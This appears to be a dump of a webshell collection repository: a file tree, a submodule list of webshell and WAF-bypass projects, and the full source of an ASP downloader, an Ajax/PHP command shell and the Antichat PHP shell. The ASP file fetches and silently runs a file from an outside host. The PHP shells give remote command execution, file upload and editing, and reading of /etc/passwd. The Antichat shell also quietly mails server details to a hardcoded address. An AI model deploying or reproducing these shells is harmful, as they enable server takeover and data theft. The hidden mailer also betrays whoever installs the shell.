│ │ ├── sql.php.php.txt
│ │ ├── uploader.php.php.txt
│ │ ├── w.php.php.txt
│ │ ├── w3d.php.php.txt
│ │ ├── w4k.php.php.txt
│ │ ├── wacking.php.php.txt
│ │ ├── webadmin.php.php.txt
│ │ ├── webshell.php.txt
│ │ ├── wso.txt
│ │ ├── xinfo.php.php.txt
│ │ └── zacosmall.php.txt
│ ├── PY/
│ │ ├── Phyton Shell.py.txt
│ │ ├── cgi-python.py.txt
│ │ ├── smtpd.py.txt
│ │ └── wh_bindshell.py.txt
│ ├── README.md
│ └── others/
│ └── tools/
│ └── DefaceKeeper_0.2.php.txt
├── xl7dev/
│ └── webshell/
│ └── other/
│ └── webshell/
│ └── read.me
├── zxc7528064/
│ └── -WebShell-/
│ └── README.md
└── 几种实战成功过的webshell的免杀方式.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/FUNDING.yml
================================================
# These are supported funding model platforms
github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
patreon: # Replace with a single Patreon username
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: # Replace with a single Liberapay username
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
custom: # Replace with a single custom sponsorship URL
================================================
FILE: .gitmodules
================================================
[submodule "xl7dev/WebShell"]
path = xl7dev/WebShell
url = https://github.com/xl7dev/WebShell
[submodule "JohnTroony/php-webshells"]
path = JohnTroony/php-webshells
url = https://github.com/JohnTroony/php-webshells
[submodule "BlackArch/webshells"]
path = BlackArch/webshells
url = https://github.com/BlackArch/webshells
[submodule "LandGrey/webshell-detect-bypass"]
path = LandGrey/webshell-detect-bypass
url = https://github.com/LandGrey/webshell-detect-bypass
[submodule "JoyChou93/webshell"]
path = JoyChou93/webshell
url = https://github.com/JoyChou93/webshell
[submodule "bartblaze/PHP-backdoors"]
path = bartblaze/PHP-backdoors
url = https://github.com/bartblaze/PHP-backdoors
[submodule "WangYihang/Webshell-Sniper"]
path = WangYihang/Webshell-Sniper
url = https://github.com/WangYihang/Webshell-Sniper
[submodule "threedr3am/JSP-Webshells"]
path = threedr3am/JSP-Webshells
url = https://github.com/threedr3am/JSP-Webshells
[submodule "DeEpinGh0st/PHP-bypass-collection"]
path = DeEpinGh0st/PHP-bypass-collection
url = https://github.com/DeEpinGh0st/PHP-bypass-collection
[submodule "lcatro/PHP-WebShell-Bypass-WAF"]
path = lcatro/PHP-WebShell-Bypass-WAF
url = https://github.com/lcatro/PHP-WebShell-Bypass-WAF
[submodule "ysrc/webshell-sample"]
path = ysrc/webshell-sample
url = https://github.com/ysrc/webshell-sample
[submodule "tanjiti/webshellSample"]
path = tanjiti/webshellSample
url = https://github.com/tanjiti/webshellSample
[submodule "webshellpub/awsome-webshell"]
path = webshellpub/awsome-webshell
url = https://github.com/webshellpub/awsome-webshell
[submodule "tdifg/WebShell"]
path = tdifg/WebShell
url = https://github.com/tdifg/WebShell
[submodule "malwares/WebShell"]
path = malwares/WebShell
url = https://github.com/malwares/WebShell
[submodule "lhlsec/webshell"]
path = lhlsec/webshell
url = https://github.com/lhlsec/webshell
[submodule "oneoneplus/webshell"]
path = oneoneplus/webshell
url = https://github.com/oneoneplus/webshell
[submodule "vnhacker1337/Webshell"]
path = vnhacker1337/Webshell
url = https://github.com/vnhacker1337/Webshell
[submodule "backlion/webshell"]
path = backlion/webshell
url = https://github.com/backlion/webshell
[submodule "AntSwordProject/AwesomeScript"]
path = AntSwordProject/AwesomeScript
url = https://github.com/AntSwordProject/AwesomeScript
[submodule "cseroad/Webshell_Generate"]
path = cseroad/Webshell_Generate
url = https://github.com/cseroad/Webshell_Generate
[submodule "rexSurprise/webshell-free"]
path = rexSurprise/webshell-free
url = https://github.com/rexSurprise/webshell-free
[submodule "0xAbbarhSF/CTF-WebShells-"]
path = 0xAbbarhSF/CTF-WebShells-
url = https://github.com/0xAbbarhSF/CTF-WebShells-
[submodule "zxc7528064/-WebShell-"]
path = zxc7528064/-WebShell-
url = https://github.com/zxc7528064/-WebShell-
[submodule "xl7dev/WebShell"]
path = xl7dev/WebShell
url = https://github.com/xl7dev/WebShell
[submodule "xl7dev/WebShell/Other/Webshell"]
path = xl7dev/WebShell/Other/Webshell
url = https://github.com/xl7dev/WebShell
================================================
FILE: 0xAbbarhSF/CTF-WebShells-/README.md
================================================
# CTF-WebShells-
Collection of some Handy Capture The Flag 🟩 Web Shells .. Enjoy:D
<img src="https://raw.githubusercontent.com/0xAbbarhSF/CTF-WebShells-/main/images%20(15).jpeg">
<img src="https://raw.githubusercontent.com/0xAbbarhSF/CTF-WebShells-/main/images%20(16).jpeg">
My Twitter: - 🕊️ [@0xAbbarhSF](https://twitter.com/0xAbbarhSF) <img src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white">
================================================
FILE: 138shell/A/Ajan.asp.txt
================================================
<SCRIPT LANGUAGE="VBScript">
<%
Set entrika = CreateObject("Scripting.FileSystemObject")
Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
entrika.write "Dim BinaryData" & vbcrlf
entrika.write "Dim xml" & vbcrlf
entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
entrika.write "xml.Send" & vbcrlf
entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
entrika.write "Const adTypeBinary = 1" & vbcrlf
entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
entrika.write "Dim BinaryStream" & vbcrlf
entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
entrika.write "BinaryStream.Open" & vbcrlf
entrika.write "BinaryStream.Write BinaryData" & vbcrlf
entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
entrika.write "Dim WshShell" & vbcrlf
entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
entrika.close
Set entrika = Nothing
Set entrika = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\net.vbs", 0, false
%>
</SCRIPT>
================================================
FILE: 138shell/A/Ajax_PHP Command Shell.txt
================================================
<?php
session_start();
error_reporting(0);
$password = "password"; //Change this to your password ;)
$version = "0.7B";
$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"
);
$thisfile = basename(__FILE__);
$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}
table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}
}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
}
}
if(isset($_GET['runcmd']))
{
$cmd = $_GET['runcmd'];
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}
elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}
}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}
elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
© By Ironfist
The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.
If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.
<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.
I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P
- Iron
';
}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{
if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";
if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}
}
print "<td>";
foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}
print "</td><td>";
foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}
print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{
$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}
}
//Execute any other command
else
{
if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}
$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}
function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}
function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}
function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}
function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}
function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>
<form name="extras"><br>
<center><b>Quick Commands</b><br>
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>
</center>
</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>
<br>
<br>
<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>
</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}
?>
================================================
FILE: 138shell/A/Antichat Shell v1.3.txt
================================================
<?php
session_start();
set_time_limit(9999999);
$login='virangar';
$password='r00t';
$auth=1;
$version='version 1.3 by Grinay';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$sd98 = "john.barker446@gmail.com";
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
if(@$_POST['action']=="exit")unset($_SESSION['an']);
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
if($_SESSION['an']==0){
echo $header;
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
echo $footer;
exit;}
if($_SESSION['action']=="")$_SESSION['action']="viewer";
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
}
//end downloader
?>
<? echo $header;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
<table><tr>
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
</tr></table></td></tr></table><br>
<form name='reqs' method='POST'>
<input name='action' type='hidden' value=''>
<input name='dir' type='hidden' value=''>
<input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">
<?
//shell
function shell($cmd){
if (!empty($cmd)){
$fp = popen($cmd,"r");
{
$result = "";
while(!feof($fp)){$result.=fread($fp,1024);}
pclose($fp);
}
$ret = $result;
$ret = convert_cyr_string($ret,"d","w");
}
return $ret;}
if($action=="shell"){
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
<input type=\"submit\" value=\"execute\"></form>";}
//end shell
//viewer FS
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function scandire($dir){
$dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
echo "</td></tr>";
}
echo "<tr><td>OS: ".@php_uname()."</td></tr>
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
<td>'.perms($linkfile).'</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}}}
if($action=="viewer"){
scandire($dir);
}
//end viewer FS
//editros
if($action=="editor"){
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
$contents = fread($le, filesize($file));
fclose($le);}
